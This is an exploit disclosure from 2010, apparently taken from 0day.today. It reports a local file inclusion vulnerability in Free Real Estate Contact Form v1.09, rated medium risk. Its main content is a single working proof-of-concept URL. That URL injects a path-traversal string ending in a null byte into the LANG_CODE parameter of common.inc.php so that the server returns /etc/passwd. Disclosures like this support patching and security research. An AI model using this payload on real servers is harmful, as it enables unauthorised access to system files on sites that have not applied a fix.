id: 9674
date: 03/16/2010
title: Free Real Estate Contact Form v1.09 - Local File Inclusion Vulnerability
author: Pouya Daneshmand
cves: 

========================================================================
Free Real Estate Contact Form v1.09 - Local File Inclusion Vulnerability
========================================================================

#################################################################
# Application Info:
# Name: Free Real Estate Contact Form
# Version: 1.09
# Vendor: http://www.phpkobo.com/realestate_contact.php
#################################################################
# Vulnerability Info:
# Type: Local File Inclusion
# Risk: Medium
#################################################################
Vulnerability:
http://site.com/codelib/sys/common.inc.php?LANG_CODE=../../../../../../../etc/passwd%00
#################################################################



#  0day.today [2023-03-25]  #